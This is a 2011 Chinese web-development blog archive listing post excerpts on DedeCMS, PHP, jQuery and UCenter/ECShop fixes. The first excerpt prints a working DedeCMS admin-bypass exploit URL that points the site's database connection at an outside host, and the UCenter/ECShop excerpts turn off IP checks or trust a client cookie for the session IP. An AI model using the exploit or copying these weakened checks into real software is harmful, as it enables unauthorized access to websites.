Archive for the ‘ 网络 ’ Category

dedecms5.x最新安全漏洞,get webshell 免账号密码直接进入后台

  • 八月 12th, 2011
  • Posted in 网络

众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。今天在群里得到织梦官方论坛某版主可靠消息:“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。” 入侵步骤如下:http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root 把上面黑底黄字上的字母改为当前的验证码,即可直接进入网站后台。 稍微分析了一下,此漏洞的前提是必须得到后台路径才能实现,因此大家一定要养成使用DEDECMS建站时改后台名字的习惯。下面给出官方的解决办法: 解决办法: [ READ MORE ]

中国第一代程序员时代终结

  • 八月 12th, 2011
  • Posted in 网络

2011年7月,仅仅47岁的“中国第一程序员”求伯君彻底退隐江湖。这代表着一个时代的过去,在求伯君风光的年代,程序员身上充满着个人英雄主义的浪漫情怀。而随着时间的不断推移,单个程序员的能力显得越来越渺小,程序员逐渐沦为软件生产流水线上一颗螺丝钉,这让第一代程序员的神话再难重现。 过去的20年,是中国程序员快意恩仇的江湖时代,程序员通过知识实现梦想和财富。历数曾经的数字英雄,名利双收的并不多见。而程序、经营两手抓的更是凤毛麟角。 [ READ MORE ]

php中文分词,dedecms分词算法

  • 八月 8th, 2011
  • Posted in 网络

目前mysql版本貌似不支持中文全文索引, 常用的dedecms内嵌了分词词典和算法, 虽然分词效果不是很理想, 但将就下还是能用的,本人已把dedecms分词词典导出为一个txt了,如果你觉得有些词匹配不是很理想,可以单独加进去. 使用很简单,以下是一个简单的php中文分词实例代码如下: [ READ MORE ]

dedecms5.7搜索页打开很慢或出现空白的解决方法

  • 七月 26th, 2011
  • Posted in 网络

dedecms5.7,在使用搜索功能的时候,点击搜索,页面会长时间打不开,导致链接失败或者出现空白,这是因为5.7启用了全文搜索,所以需要到系统参数设置->其他选项 [ READ MORE ]

jquery 左右晃动效果

  • 七月 13th, 2011
  • Posted in 网络

类似wordpress登陆框密码错误时,登陆框左右晃动的效果。 <!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd“> <html xmlns=”http://www.w3.org/1999/xhtml“> <head> <meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ /> <title>jquery左右晃动效果</title> <style type=”text/css”> body { font: 12px Georgia, serif; } a { text-decoration: none; } #box{width:400px;height:200px;background-color:#ccc;text-align:center} </style> <script type=”text/javascript” src=”http://ajax.googleapis.com/ajax/libs/jquery/1.4.0/jquery.min.js”></script> <script type=”text/javascript”> var box_left = 0; [ READ MORE ]

php如何防御cc攻击

  • 五月 21st, 2011
  • Posted in 网络

攻击者借助代理服务器生成指向受害主机的合法请求,实现DOS,和伪装就叫:cc(ChallengeCollapsar)。这种攻击模式已经算是老技术了,甚至不能称之为一门技术。 但是在现在,还是有许许多多的主机抵抗不了CC的骚扰。 可以说CC攻击的适用性和破坏性不比DDOS的差,经过了这几天的实验,发现了许多政府相关部门的网站都支持不住CC的攻击,更别说我们许许多多的Wordpress用户了。 WordPress以功能强大,扩展性强称霸博客界,但是殊不知在功能强大的背后更显脆弱,原来看过一篇文章,其中提到Wordpress的强大足以作为一个CMS大型网站,但是现在看来要用Wordpress做大型网站还得做些防范措施了。 [ READ MORE ]

php面向对象类的实例详解

  • 五月 15th, 2011
  • Posted in 网络

一:结构和调用(实例化): class className{} ,调用:$obj = new className();当类有构造函数时,还应传入参数。如$obj = new className($v,$v2…); 二:构造函数和析构函数: 1、构造函数用于初始化:使用__construct(),可带参数。 2、但析构函数不能带参数(用于在销去一个类之前执行一些操作或功能)。析构函数用__destruct()做名称。在脚本执行结束时,PHP会销掉内存中的对象,因此可不用析造函数,但有些比如COOKIE等,就应当要用此函数销掉。 知识点:在PHP4中也提供了构造函数,但使用的是与类同名的类方法,在PHP5仍能兼容这种做法,当一个类中没有包含__construct时,会查找与类同名的方法,如果找到,就认为是构造函数,如下:class test { var $b; function test() { $this->b=5; } function addab($c) { return $this->b+$c; } } [ READ MORE ]

ucenter管理员登陆自动退出的解决办法

  • 五月 9th, 2011
  • Posted in 网络

discuz和ucenter判断管理员登陆都用了IP加密验证的,如果你是动态IP,或者几个管理员使用一个账号,这在康盛看来是不安全滴。但有时候我们测试或者做什么,不可能不会遇到动态IP的问题,那就得找解决的办法咯。 discuz解决办法相当简单,打开config目录下的config_global_default.php $_config['admincp']['checkip'] = 1; 找到这行把1改成0即可。 ucenter原理一样,但没有直接设置,打开model/base.php,找到$this->onlineip = $match ? $match : ‘unknown’;这句, 在它的下面增加以下代码: $isonlineIP = isset($_COOKIE['onlineipd']) && !empty($_COOKIE['onlineipd']); if($isonlineIP){ [ READ MORE ]

ecshop无法加入购物车,点击结算按钮没有商品的解决办法

  • 五月 9th, 2011
  • Posted in 网络

前两天使用ECSHOP的时候在公司上班测试发现的问题。 ECSHOP动态IP的SESSEION机制导致很多在公司或者其他地方的动态IP无法购物。 打开根目录下includes\cls_session.php 大概在82行,找到这个。 $this->_ip = real_ip(); 把他替换成: if(isset($_COOKIE['real_ipd']) && !empty($_COOKIE['real_ipd'])){ $this->_ip = $_COOKIE['real_ipd']; [ READ MORE ]

php wsdl服务接口说明

  • 五月 9th, 2011
  • Posted in 网络

既然今晚来更新博客了,就多更新几篇,嘿嘿。 前几天工作,客户一个网页游戏接口是.net的wsdl接口,叫用php与其通信,soap库轻松搞定,之前一直都没用php弄过wsdl服务端接口,既然工作中碰到了,就往下再了解下,到官网搜了下,详细说明如下,请访问官网自己了解吧。 http://www.php.net/manual/zh/SCA.examples.understanding-wsdl.php 由于英语不是很好,用谷歌翻译看了下,大致了解了下什么回事,然后用ZDE试着编译一个wsdl接口文件,NND,一编译我的zend就死掉了,谷歌一下,人家说不能用左键,要用右键点击,我左右都试了,还是挂掉,晕了。不会是我zend绿色版的缘故吧?我的5.5绿色版。当时坐在办公室真郁闷啊。没办法,不行总不能老僵持着。 回到家继续试一下,NN个熊的,又可以正常编译生成了,真晕了。 啊,快一点了,明天周一,哦,应该算是今天了,公交最挤的一天,早点休息吧,希望今天能有新的收获! 我是龙的传人,但为什么就没有真命天子的命呢,这个问题比较严重… [ READ MORE ]

Recent Comments

随机文章

Category